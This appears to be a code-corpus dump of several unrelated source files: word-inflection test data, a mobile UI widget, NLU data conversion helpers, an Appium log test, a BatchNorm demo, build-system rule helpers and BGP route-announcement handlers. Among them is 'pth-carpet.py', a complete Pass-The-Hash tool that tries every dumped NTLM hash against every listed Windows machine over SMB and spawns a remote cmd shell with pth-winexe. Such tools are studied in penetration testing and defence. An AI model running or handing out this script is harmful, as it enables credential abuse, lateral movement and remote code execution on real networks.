), # Is `littlenesses` a valid plural?
(
"puzzling",
{
"n": {
"puzzle",
"puzzlers",
"puzzler",
"puzzlement",
"puzzlements",
"puzzles",
},
"a": {"puzzling"},
"v": {"puzzle", "puzzled", "puzzles", "puzzling"},
"r": set(),
},
),
(
"overrated",
{
"n": {"overratings", "overrating"},
"a": set(),
"v": {"overrated", "overrating", "overrate", "overrates"},
"r": set(),
},
),
(
"walk",
{
"n": {"walking", "walks", "walkings", "walker", "walk", "walkers"},
"a": {"walking"},
"v": {"walked", "walking", "walk", "walks"},
"r": set(),
},
),
(
"walking",
{
"n": {"walking", "walks", "walkings", "walker", "walk", "walkers"},
"a": {"walking"},
"v": {"walked", "walking", "walk", "walks"},
"r": set(),
},
),
(
"be",
{
"n": {"beings", "being"},
"a": set(),
"v": {
"wasn't",
"being",
"be",
"are",
"was",
"am",
"isn't",
"is",
"aren't",
"been",
"weren't",
"were",
"am not",
},
"r": set(),
},
),
(
"am",
{
"n": {"beings", "being"},
"a": set(),
"v": {
"wasn't",
"being",
"be",
"are",
"was",
"am",
"isn't",
"is",
"aren't",
"been",
"weren't",
"were",
"am not",
},
"r": set(),
},
),
(
"run",
{
"n": {
"runnings",
"run",
"runninesses",
"runner",
"runniness",
"running",
"runs",
"runners",
},
"a": {"running", "runny"},
"v": {"running", "ran", "run", "runs"},
"r": set(),
},
),
(
"ran",
{
"n": {
"runnings",
"run",
"runninesses",
"runner",
"runniness",
"running",
"runs",
"runners",
},
"a": {"running", "runny"},
"v": {"running", "ran", "run", "runs"},
"r": set(),
},
),
(
"blanket",
{
"n": {"blanket", "blankets"},
"a": {"blanket"},
"v": {"blankets", "blanketed", "blanketing", "blanket"},
"r": set(),
},
),
] |
src/enamlnative/widgets/chronometer.py | codelv/enaml-native | 237 | 12664721 | <reponame>codelv/enaml-native
"""
Copyright (c) 2017, <NAME>.
Distributed under the terms of the MIT License.
The full license is in the file LICENSE, distributed with this software.
Created on May 20, 2017
@author: jrm
"""
from atom.api import (
Typed, ForwardTyped, Long, Str, Enum, Bool, observe, set_default
)
from datetime import datetime
from enaml.core.declarative import d_
from .text_view import TextView, ProxyTextView
class ProxyChronometer(ProxyTextView):
""" The abstract definition of a proxy Chronometer object.
"""
#: A reference to the Label declaration.
declaration = ForwardTyped(lambda: Chronometer)
def set_base(self, base):
raise NotImplementedError
def set_format(self, format):
raise NotImplementedError
def set_direction(self, direction):
raise NotImplementedError
def set_running(self, running):
raise NotImplementedError
def set_mode(self, mode):
raise NotImplementedError
class Chronometer(TextView):
""" A simple control for displaying read-only text.
"""
#: Set the time that the count-up timer is in reference to.
base = d_(Typed(datetime, factory=datetime.now))
#: Tick counter
ticks = d_(Long(), writable=False)
#: Sets the format string used for display.
format = d_(Str())
#: Counting direction
direction = d_(Enum('up', 'down'))
#: Defines the behavior when restarting
#: If mode is resume it will continue otherwise
#: it will reset the count.
mode = d_(Enum('resume', 'reset', 'manual'))
#: Start / stop the counter
running = d_(Bool())
#: A reference to the ProxyLabel object.
proxy = Typed(ProxyChronometer)
@observe('base', 'direction', 'format', 'running', 'mode')
def _update_proxy(self, change):
""" An observer which sends the state change to the proxy.
"""
# The superclass implementation is sufficient.
super(Chronometer, self)._update_proxy(change)
|
nlu/pipe/utils/data_conversion_utils.py | milyiyo/nlu | 480 | 12664725 | <reponame>milyiyo/nlu<gh_stars>100-1000
"""Get data into JVM for prediction and out again as Spark Dataframe"""
import logging
logger = logging.getLogger('nlu')
import pyspark
from pyspark.sql.functions import monotonically_increasing_id
import numpy as np
import pandas as pd
from pyspark.sql.types import StringType, StructType, StructField
class DataConversionUtils():
# Modin aswell but optional, so we dont import the type yet
supported_types = [pyspark.sql.DataFrame, pd.DataFrame, pd.Series, np.ndarray]
@staticmethod
def except_text_col_not_found(cols):
print(
f'Could not find column named "text" in input Pandas Dataframe. Please ensure one column named such exists. Columns in DF are : {cols} ')
@staticmethod
def sdf_to_sdf(data, spark_sess, raw_text_column='text'):
"""No casting, Spark to Spark. Just add index col"""
output_datatype = 'spark'
data = data.withColumn('origin_index', monotonically_increasing_id().alias('origin_index'))
stranger_features = []
if raw_text_column in data.columns:
# store all stranger features
if len(data.columns) > 1:
stranger_features = list(set(data.columns) - set(raw_text_column))
else:
DataConversionUtils.except_text_col_not_found(data.columns)
return data, stranger_features, output_datatype
@staticmethod
def pdf_to_sdf(data, spark_sess, raw_text_column='text'):
"""Casting pandas to spark and add index col"""
output_datatype = 'pandas'
stranger_features = []
sdf = None
# set first col as text column if there is none
if raw_text_column not in data.columns: data.rename(columns={data.columns[0]: 'text'}, inplace=True)
data['origin_index'] = data.index
if raw_text_column in data.columns:
if len(data.columns) > 1:
# make Nans to None, or spark will crash
data = data.where(pd.notnull(data), None)
data = data.dropna(axis=1, how='all')
stranger_features = list(set(data.columns) - set(raw_text_column))
sdf = spark_sess.createDataFrame(data)
else:
DataConversionUtils.except_text_col_not_found(data.columns)
return sdf, stranger_features, output_datatype
@staticmethod
def pds_to_sdf(data, spark_sess, raw_text_column='text'):
"""Casting pandas series to spark and add index col. # for df['text'] colum/series passing casting follows pseries->pdf->spark->pd """
output_datatype = 'pandas_series'
sdf = None
schema = StructType([StructField(raw_text_column, StringType(), True)])
data = pd.DataFrame(data).dropna(axis=1, how='all')
# If series from a column is passed, its column name will be reused.
if raw_text_column not in data.columns and len(data.columns) == 1:
data[raw_text_column] = data[data.columns[0]]
else:
logger.info(
f'INFO: NLU will assume {data.columns[0]} as label column since default text column could not be find')
data[raw_text_column] = data[data.columns[0]]
data['origin_index'] = data.index
if raw_text_column in data.columns:
sdf = spark_sess.createDataFrame(pd.DataFrame(data[raw_text_column]), schema=schema)
else:
DataConversionUtils.except_text_col_not_found(data.columns)
if 'origin_index' not in sdf.columns:
sdf = sdf.withColumn('origin_index', monotonically_increasing_id().alias('origin_index'))
return sdf, [], output_datatype
@staticmethod
def np_to_sdf(data, spark_sess, raw_text_column='text'):
"""Casting numpy array to spark and add index col. This is a bit inefficient. Casting follow np->pd->spark->pd. We could cut out the first pd step """
output_datatype = 'numpy_array'
if len(data.shape) != 1: ValueError(
f"Exception : Input numpy array must be 1 Dimensional for prediction.. Input data shape is{data.shape}")
sdf = spark_sess.createDataFrame(pd.DataFrame({raw_text_column: data, 'origin_index': list(range(len(data)))}))
return sdf, [], output_datatype
@staticmethod
def str_to_sdf(data, spark_sess, raw_text_column='text'):
"""Casting str to spark and add index col. This is a bit inefficient. Casting follow # inefficient, str->pd->spark->pd , we can could first pd"""
output_datatype = 'string'
sdf = spark_sess.createDataFrame(pd.DataFrame({raw_text_column: data, 'origin_index': [0]}, index=[0]))
return sdf, [], output_datatype
@staticmethod
def str_list_to_sdf(data, spark_sess, raw_text_column='text'):
"""Casting str list to spark and add index col. This is a bit inefficient. Casting follow # # inefficient, list->pd->spark->pd , we can could first pd"""
output_datatype = 'string_list'
if all(type(elem) == str for elem in data):
sdf = spark_sess.createDataFrame(
pd.DataFrame({raw_text_column: pd.Series(data), 'origin_index': list(range(len(data)))}))
else:
ValueError("Exception: Not all elements in input list are of type string.")
return sdf, [], output_datatype
@staticmethod
def fallback_modin_to_sdf(data, spark_sess, raw_text_column='text'):
"""Casting potential Modin data to spark and add index col. # Modin tests, This could crash if Modin not installed """
sdf = None
output_datatype = ''
try:
import modin.pandas as mpd
if isinstance(data, mpd.DataFrame):
data = pd.DataFrame(data.to_dict()) # create pandas to support type inference
output_datatype = 'modin'
data['origin_index'] = data.index
if raw_text_column in data.columns:
if len(data.columns) > 1:
data = data.where(pd.notnull(data), None) # make Nans to None, or spark will crash
data = data.dropna(axis=1, how='all')
stranger_features = list(set(data.columns) - set(raw_text_column))
sdf = spark_sess.createDataFrame(data)
else:
DataConversionUtils.except_text_col_not_found(data.columns)
if isinstance(data, mpd.Series):
output_datatype = 'modin_series'
data = pd.Series(data.to_dict()) # create pandas to support type inference
data = pd.DataFrame(data).dropna(axis=1, how='all')
data['origin_index'] = data.index
index_provided = True
if raw_text_column in data.columns:
sdf = spark_sess.createDataFrame(data[['text']])
else:
DataConversionUtils.except_text_col_not_found(data.columns)
except:
print(
"If you use Modin, make sure you have installed 'pip install modin[ray]' or 'pip install modin[dask]' backend for Modin ")
return sdf, [], output_datatype
@staticmethod
def to_spark_df(data, spark_sess, raw_text_column='text'):
"""Convert supported datatypes to SparkDF and extract extra data for prediction later on."""
try:
if isinstance(data, pyspark.sql.dataframe.DataFrame):
return DataConversionUtils.sdf_to_sdf(data, spark_sess, raw_text_column)
elif isinstance(data, pd.DataFrame):
return DataConversionUtils.pdf_to_sdf(data, spark_sess, raw_text_column)
elif isinstance(data, pd.Series):
return DataConversionUtils.pds_to_sdf(data, spark_sess, raw_text_column)
elif isinstance(data, np.ndarray):
return DataConversionUtils.np_to_sdf(data, spark_sess, raw_text_column)
elif isinstance(data, str):
return DataConversionUtils.str_to_sdf(data, spark_sess, raw_text_column)
elif isinstance(data, list):
return DataConversionUtils.str_list_to_sdf(data, spark_sess, raw_text_column)
else:
return DataConversionUtils.fallback_modin_to_sdf(data, spark_sess, raw_text_column)
except:
ValueError("Data could not be converted to Spark Dataframe for internal conversion.")
|
hard-gists/3018bf3643f80798bde75c17571a38a9/snippet.py | jjhenkel/dockerizeme | 1,139 | 12664730 | <filename>hard-gists/3018bf3643f80798bde75c17571a38a9/snippet.py
#!/usr/bin/python
#
# Simple script intended to perform Carpet Bombing against list
# of provided machines using list of provided LSA Hashes (LM:NTLM).
# The basic idea with Pass-The-Hash attack is to get One hash and use it
# against One machine. There is a problem with this approach of not having information,
# onto what machine we could have applied the hash.
# To combat this issue - the below script was born.
#
# Requirements:
# This script requires 'pth-winexe' utility (or winexe renamed to pth-winexe') be present
# within system during script's invocation. In case this utility will not be present -
# no further check upon ability to run commands from PTH attack - will be displayed.
# Also, modules such as:
# - impacket
#
# Notice:
# This script is capable of verifying exploitability of only Windows boxes. In case
# of other type of boxes (running Samba) pth-winexe will not yield satisfying results.
#
# Usage:
# $ ./pth-carpet.py machines.txt pwdump
#
# coded by:
# <NAME>., 2016 / mgeeky
# version 0.2
#
# Should be working on Windows boxes as well as on Linux ones.
#
from __future__ import print_function
import os
import sys
import argparse
import signal
import logging
import threading
import subprocess
import multiprocessing
from termcolor import colored
from functools import partial
from multiprocessing.managers import BaseManager
from impacket.dcerpc.v5 import transport
WORKERS = multiprocessing.cpu_count() * 4
TIMEOUT = 10
OPTIONS = None
LOCK = multiprocessing.Lock()
def info(txt):
with LOCK:
print (txt)
def success(txt):
info(colored('[+] '+txt, 'green', attrs=['bold']))
def warning(txt):
info(colored('[*] '+txt, 'yellow'))
def verbose(txt):
if OPTIONS.v:
info(colored('[?] '+txt, 'white'))
def err(txt):
info(colored('[!] '+txt, 'red'))
class Command(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
self.output = ''
self.error = ''
verbose( '\tCalling: "%s"' % cmd)
def get_output(self):
return self.output, self.error
def run(self, stdin, timeout):
def target():
self.process = subprocess.Popen(self.cmd, shell=True, \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
self.output, self.error = self.process.communicate(stdin)
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
self.process.terminate()
thread.join()
return False
else:
return True
def init_worker():
# http://stackoverflow.com/a/6191991
signal.signal(signal.SIGINT, signal.SIG_IGN)
def cmd_exists(cmd):
return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
def check_rce(host, username, hash, port):
verbose('\tChecking whether provided hash can be used to PTH remote code execution')
if cmd_exists('pth-winexe'):
userswitch = '%s%%%s' % (username, hash)
c = Command('pth-winexe -U %s //%s cmd' % (userswitch, host))
if c.run('exit\n', TIMEOUT):
pass
else:
verbose('\tPTH-Winexe had to be terminated.')
out, error = c.get_output()
if 'Microsoft' in out and '(C) Copyright' in out and '[Version' in out:
return True
else:
errorm = error[error.find('NT_STATUS'):].strip()
if not errorm.startswith('NT_STATUS'):
if 'NT_STATUS' in error:
errorm = error
else:
errorm = 'Unknown error'
if OPTIONS.v:
err('\tCould not spawn shell using PTH: ' + errorm)
else:
warning('\tPlease check above hash whether using it you can access writeable $IPC share to execute cmd.')
return False
def login(host, username, hash, port):
stringbinding = 'ncacn_np:%s[\pipe\svcctl]' % host
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
lmhash, nthash = hash.split(':')
rpctransport.set_credentials(username, '', '', lmhash, nthash, None)
dce = rpctransport.get_dce_rpc()
try:
dce.connect()
return check_rce(host, username, hash, port)
except Exception, e:
raise e
def correct_hash(hash):
lmhash, nthash = hash.split(':')
if '*' in lmhash:
lmhash = '0' * 32
if '*' in nthash:
nthash = '0' * 32
return lmhash + ':' + nthash
def worker(stopevent, pwdump, machine):
for user, hash in pwdump.items():
if stopevent.is_set():
break
hash = correct_hash(hash)
try:
if login(machine, user, hash, OPTIONS.port):
success('Pass-The-Hash with shell spawned: %s@%s (%s)' % (user, machine, hash))
else:
if OPTIONS.v:
warning('Connected using PTH but could\'nt spawn shell: %s@%s (%s)' % (user, machine, hash))
except Exception, e:
verbose('Hash was not accepted: %s@%s (%s)\n\t%s' % (user, machine, hash, str(e)))
def main():
global OPTIONS
print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\t<NAME>., 2016\n', 'white', attrs=['bold']))
parser = argparse.ArgumentParser(add_help = True, description='Pass-The-Hash mass checking tool')
parser.add_argument('rhosts', nargs='?', help='Specifies input file containing list of machines or CIDR notation of hosts')
parser.add_argument('hashes', nargs='?', help='Specifies input file containing list of dumped hashes in pwdump format')
parser.add_argument('-v', action='store_true', help='Verbose mode')
parser.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar='smb port', help='Destination port used to connect into SMB Server')
if len(sys.argv) < 3:
parser.print_help()
sys.exit(1)
OPTIONS = parser.parse_args()
machines = [x.strip() for x in open(OPTIONS.rhosts).readlines() ]
rawpwdump = [x.strip() for x in open(OPTIONS.hashes).readlines() ]
pwdump = {}
for p in rawpwdump:
try:
user = p.split(':')[0]
hash = p.split(':')[2] + ':' + p.split(':')[3]
except:
err('Supplied hashes file does not conform PWDUMP format!')
err('\tIt must be like this: <user>:<id>:<lmhash>:<nthash>:...')
sys.exit(1)
pwdump[user] = hash
warning('Testing %d hashes against %d machines. Resulting in total in %d PTH attempts\n' \
% (len(pwdump), len(machines), len(pwdump) * len(machines)))
stopevent = multiprocessing.Manager().Event()
try:
pool = multiprocessing.Pool(WORKERS, init_worker)
func = partial(worker, stopevent, pwdump)
pool.map_async(func, machines)
pool.close()
pool.join()
except KeyboardInterrupt:
pool.terminate()
pool.join()
success('\nUser interrupted the script.')
if __name__ == '__main__':
main() |
test/unit/webdriver/log_test.py | appium/python-clien | 1,383 | 12664744 | #!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import httpretty
from appium.webdriver.webdriver import WebDriver
from test.unit.helper.test_helper import appium_command, get_httpretty_request_body, ios_w3c_driver
class TestWebDriverLog(object):
@httpretty.activate
def test_get_log_types(self):
driver = ios_w3c_driver()
httpretty.register_uri(
httpretty.GET,
appium_command('/session/1234567890/log/types'),
body=json.dumps({'value': ['syslog']}),
)
log_types = driver.log_types
assert log_types == ['syslog']
@httpretty.activate
def test_get_log(self):
driver = ios_w3c_driver()
httpretty.register_uri(
httpretty.POST,
appium_command('/session/1234567890/log'),
body=json.dumps({'value': ['logs as array']}),
)
log_types = driver.get_log('syslog')
assert log_types == ['logs as array']
d = get_httpretty_request_body(httpretty.last_request())
assert {'type': 'syslog'} == d
|
junior_class/chapter-3-Computer_Vision/code/CNN_Basis/BatchNorm2D.py | wwhio/awesome-DeepLearning | 1,150 | 12664752 | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
输入数据形状是[N, C, H, W]时的batchnorm示例
'''
import numpy as np
import paddle
from paddle.nn import BatchNorm2D
# 设置随机数种子,这样可以保证每次运行结果一致
np.random.seed(100)
# 创建数据
data = np.random.rand(2, 3, 3, 3).astype('float32')
# 使用BatchNorm2D计算归一化的输出
# 输入数据维度[N, C, H, W],num_features等于C
bn = BatchNorm2D(num_features=3)
x = paddle.to_tensor(data)
y = bn(x)
print('input of BatchNorm2D Layer: \n {}'.format(x.numpy()))
print('output of BatchNorm2D Layer: \n {}'.format(y.numpy()))
# 取出data中第0通道的数据,
# 使用numpy计算均值、方差及归一化的输出
a = data[:, 0, :, :]
a_mean = a.mean()
a_std = a.std()
b = (a - a_mean) / a_std
print('channel 0 of input data: \n {}'.format(a))
print('std {}, mean {}, \n output: \n {}'.format(a_mean, a_std, b))
|
cook/core/rules.py | jachris/cook | 130 | 12664761 | <reponame>jachris/cook<filename>cook/core/rules.py
import functools
import os
import traceback
from . import graph, misc, system
def rule(func):
"""Create a new rule. Calling it will be spawning a task.
This function should be used as a decorator. The passed function
must be a generator which follows the protocol.
"""
return functools.partial(graph.spawn_task, func)
def task(func):
return graph.spawn_task(func)
def publish(
inputs=None, message=None, outputs=None, check=None, force=False,
result=None, phony=False
):
"""Inform the system about the task."""
if inputs is None:
inputs = set()
elif isinstance(inputs, str):
raise TypeError(
'Inputs is a string\n\n'
'Rules must publish inputs in the form of an iterable. Wrap the '
'string in a list to resolve this issue.'
)
else:
inputs = set(map(os.path.abspath, inputs))
for input in inputs:
if not os.path.isfile(input) and not graph.has_file(input):
raise FileNotFoundError(input)
if not isinstance(message, str):
if message is None:
raise ValueError(
'Publication did not include a message\n\n'
'Every rule must publish a message, even phony ones.'
)
else:
raise TypeError(
'Supplied message is not a string\n\n'
'Every rule must publish a message in form of a string. No '
'implicit conversion is done.'
)
if not outputs:
raise ValueError(
'Rule did not declare any outputs\n\n'
'Every rule, including phony ones, must have at least 1 output.'
)
elif isinstance(outputs, str):
raise TypeError(
'Outputs is a string\n\n'
'Rules must publish outputs in the form of an iterable. Wrap the '
'string in a list to resolve this issue.'
)
else:
outputs = set(map(os.path.abspath, outputs))
for output in outputs:
if graph.has_file(output):
raise ValueError('output collision')
# elif not phony and not misc.is_inside(output, system.build('.')):
# raise ValueError('output outside of build directory')
if not isinstance(result, dict):
if result is None:
result = {}
else:
raise TypeError('result must be of type dict')
elif 'outputs' in result:
raise ValueError('outputs is reserved')
elif 'inputs' in result:
raise ValueError('inputs is reserved')
result['outputs'] = outputs
result['inputs'] = inputs
if len(outputs) == 1 and 'output' not in result:
[output] = outputs
result['output'] = output
in_files = set()
for input in inputs:
file = graph.get_file(input)
if file.producer is None:
file.stat_if_necessary()
if not file.exists:
raise FileNotFoundError(file.path)
in_files.add(file)
out_files = set()
for output in outputs:
file = graph.new_file(output)
out_files.add(file)
if not isinstance(phony, bool):
raise TypeError('phony must be a boolean')
stack = traceback.extract_stack()[:-3]
return in_files, message, out_files, check, force, result, phony, stack
def deposit(inputs=(), warnings=None):
"""Inform the system of additional inputs after execution."""
if isinstance(inputs, str):
raise TypeError('inputs must not be string')
else:
deposits = {os.path.abspath(path) for path in inputs}
for path in deposits:
if not os.path.isfile(path):
raise FileNotFoundError(path)
elif misc.is_inside(path, system.build('.')):
raise ValueError('deposit inside build directory')
if warnings is not None:
warnings = warnings.strip()
return deposits, warnings
|
src/exabgp/reactor/api/command/announce.py | pierky/exabgp | 1,560 | 12664774 | # encoding: utf-8
"""
line/watchdog.py
Created by <NAME> on 2017-07-01.
Copyright (c) 2009-2017 Exa Networks. All rights reserved.
License: 3-clause BSD. (See the COPYRIGHT file)
"""
from exabgp.reactor.api.command.command import Command
from exabgp.reactor.api.command.limit import match_neighbors
from exabgp.reactor.api.command.limit import extract_neighbors
from exabgp.protocol.ip import NoNextHop
from exabgp.bgp.message import OUT
from exabgp.bgp.message.update.attribute import NextHop
from exabgp.configuration.static import ParseStaticRoute
def register_announce():
pass
@Command.register('text', 'announce route')
def announce_route(self, reactor, service, line):
def callback():
try:
descriptions, command = extract_neighbors(line)
peers = match_neighbors(reactor.peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
yield True
return
changes = self.api_route(command)
if not changes:
self.log_failure('command could not parse route in : %s' % command)
reactor.processes.answer_error(service)
yield True
return
for change in changes:
if not ParseStaticRoute.check(change):
self.log_message(
'invalid route for %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
continue
change.nlri.action = OUT.ANNOUNCE
reactor.configuration.inject_change(peers, change)
self.log_message(
'route added to %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
reactor.processes.answer_done(service)
except ValueError:
self.log_failure('issue parsing the route')
reactor.processes.answer_error(service)
yield True
except IndexError:
self.log_failure('issue parsing the route')
reactor.processes.answer_error(service)
yield True
reactor.asynchronous.schedule(service, line, callback())
return True
@Command.register('text', 'withdraw route')
def withdraw_route(self, reactor, service, line):
def callback():
try:
descriptions, command = extract_neighbors(line)
peers = match_neighbors(reactor.peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
yield True
return
changes = self.api_route(command)
if not changes:
self.log_failure('command could not parse route in : %s' % command)
reactor.processes.answer_error(service)
yield True
return
for change in changes:
# Change the action to withdraw before checking the route
change.nlri.action = OUT.WITHDRAW
# NextHop is a mandatory field (but we do not require in)
if change.nlri.nexthop is NoNextHop:
change.nlri.nexthop = NextHop('0.0.0.0')
if not ParseStaticRoute.check(change):
self.log_message(
'invalid route for %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
continue
if reactor.configuration.inject_change(peers, change):
self.log_message(
'route removed from %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
else:
self.log_failure(
'route not found on %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
reactor.processes.answer_done(service)
except ValueError:
self.log_failure('issue parsing the route')
reactor.processes.answer_error(service)
yield True
except IndexError:
self.log_failure('issue parsing the route')
reactor.processes.answer_error(service)
yield True
reactor.asynchronous.schedule(service, line, callback())
return True
@Command.register('text', 'announce vpls')
def announce_vpls(self, reactor, service, line):
def callback():
try:
descriptions, command = extract_neighbors(line)
peers = match_neighbors(reactor.peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
yield True
return
changes = self.api_vpls(command)
if not changes:
self.log_failure('command could not parse vpls in : %s' % command)
reactor.processes.answer_error(service)
yield True
return
for change in changes:
change.nlri.action = OUT.ANNOUNCE
reactor.configuration.inject_change(peers, change)
self.log_message(
'vpls added to %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
reactor.processes.answer_done(service)
except ValueError:
self.log_failure('issue parsing the vpls')
reactor.processes.answer_error(service)
yield True
except IndexError:
self.log_failure('issue parsing the vpls')
reactor.processes.answer_error(service)
yield True
reactor.asynchronous.schedule(service, line, callback())
return True
@Command.register('text', 'withdraw vpls')
def withdraw_vpls(self, reactor, service, line):
def callback():
try:
descriptions, command = extract_neighbors(line)
peers = match_neighbors(reactor.peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
yield True
return
changes = self.api_vpls(command)
if not changes:
self.log_failure('command could not parse vpls in : %s' % command)
reactor.processes.answer_error(service)
yield True
return
for change in changes:
change.nlri.action = OUT.WITHDRAW
if reactor.configuration.inject_change(peers, change):
self.log_message(
'vpls removed from %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
else:
self.log_failure(
'vpls not found on %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
reactor.processes.answer_done(service)
except ValueError:
self.log_failure('issue parsing the vpls')
reactor.processes.answer_error(service)
yield True
except IndexError:
self.log_failure('issue parsing the vpls')
reactor.processes.answer_error(service)
yield True
reactor.asynchronous.schedule(service, line, callback())
return True
@Command.register('text', 'announce attribute')
@Command.register('text', 'announce attributes')
def announce_attributes(self, reactor, service, line):
def callback():
try:
descriptions, command = extract_neighbors(line)
peers = match_neighbors(reactor.peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
yield True
return
changes = self.api_attributes(command, peers)
if not changes:
self.log_failure('command could not parse route in : %s' % command)
reactor.processes.answer_error(service)
yield True
return
for change in changes:
change.nlri.action = OUT.ANNOUNCE
reactor.configuration.inject_change(peers, change)
self.log_message(
'route added to %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
reactor.processes.answer_done(service)
except ValueError:
self.log_failure('issue parsing the route')
reactor.processes.answer_error(service)
yield True
except IndexError:
self.log_failure('issue parsing the route')
reactor.processes.answer_error(service)
yield True
reactor.asynchronous.schedule(service, line, callback())
return True
@Command.register('text', 'withdraw attributes')
def withdraw_attribute(self, reactor, service, line):
def callback():
try:
descriptions, command = extract_neighbors(line)
peers = match_neighbors(reactor.peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
yield True
return
changes = self.api_attributes(command, peers)
if not changes:
self.log_failure('command could not parse route in : %s' % command)
reactor.processes.answer_error(service)
yield True
return
for change in changes:
change.nlri.action = OUT.WITHDRAW
if reactor.configuration.inject_change(peers, change):
self.log_message(
'route removed from %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
else:
self.log_failure(
'route not found on %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
reactor.processes.answer_done(service)
except ValueError:
self.log_failure('issue parsing the route')
reactor.processes.answer_error(service)
yield True
except IndexError:
self.log_failure('issue parsing the route')
reactor.processes.answer_error(service)
yield True
reactor.asynchronous.schedule(service, line, callback())
return True
@Command.register('text', 'announce flow')
def announce_flow(self, reactor, service, line):
def callback():
try:
descriptions, command = extract_neighbors(line)
peers = match_neighbors(reactor.peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
yield True
return
changes = self.api_flow(command)
if not changes:
self.log_failure('command could not parse flow in : %s' % command)
reactor.processes.answer_error(service)
yield True
return
for change in changes:
change.nlri.action = OUT.ANNOUNCE
reactor.configuration.inject_change(peers, change)
self.log_message(
'flow added to %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
reactor.processes.answer_done(service)
except ValueError:
self.log_failure('issue parsing the flow')
reactor.processes.answer_error(service)
yield True
except IndexError:
self.log_failure('issue parsing the flow')
reactor.processes.answer_error(service)
yield True
reactor.asynchronous.schedule(service, line, callback())
return True
@Command.register('text', 'withdraw flow')
def withdraw_flow(self, reactor, service, line):
def callback():
try:
descriptions, command = extract_neighbors(line)
peers = match_neighbors(reactor.peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
yield True
return
changes = self.api_flow(command)
if not changes:
self.log_failure('command could not parse flow in : %s' % command)
reactor.processes.answer_error(service)
yield True
return
for change in changes:
change.nlri.action = OUT.WITHDRAW
if reactor.configuration.inject_change(peers, change):
self.log_message(
'flow removed from %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
else:
self.log_failure(
'flow not found on %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
reactor.processes.answer_done(service)
except ValueError:
self.log_failure('issue parsing the flow')
reactor.processes.answer_error(service)
yield True
except IndexError:
self.log_failure('issue parsing the flow')
reactor.processes.answer_error(service)
yield True
reactor.asynchronous.schedule(service, line, callback())
return True
@Command.register('text', 'announce eor')
def announce_eor(self, reactor, service, command):
def callback(self, command, peers):
family = self.api_eor(command)
if not family:
self.log_failure("Command could not parse eor : %s" % command)
reactor.processes.answer_error(service)
yield True
return
reactor.configuration.inject_eor(peers, family)
self.log_message(
"Sent to %s : %s"
% (', '.join(peers if peers else []) if peers is not None else 'all peers', family.extensive())
)
yield False
reactor.processes.answer_done(service)
try:
descriptions, command = extract_neighbors(command)
peers = match_neighbors(reactor.established_peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
return False
reactor.asynchronous.schedule(service, command, callback(self, command, peers))
return True
except ValueError:
self.log_failure('issue parsing the command')
reactor.processes.answer_error(service)
return False
except IndexError:
self.log_failure('issue parsing the command')
reactor.processes.answer_error(service)
return False
@Command.register('text', 'announce route-refresh')
def announce_refresh(self, reactor, service, command):
def callback(self, command, peers):
refreshes = self.api_refresh(command)
if not refreshes:
self.log_failure("Command could not parse route-refresh command : %s" % command)
reactor.processes.answer_error(service)
yield True
return
reactor.configuration.inject_refresh(peers, refreshes)
for refresh in refreshes:
self.log_message(
"Sent to %s : %s"
% (', '.join(peers if peers else []) if peers is not None else 'all peers', refresh.extensive())
)
yield False
reactor.processes.answer_done(service)
try:
descriptions, command = extract_neighbors(command)
peers = match_neighbors(reactor.established_peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
return False
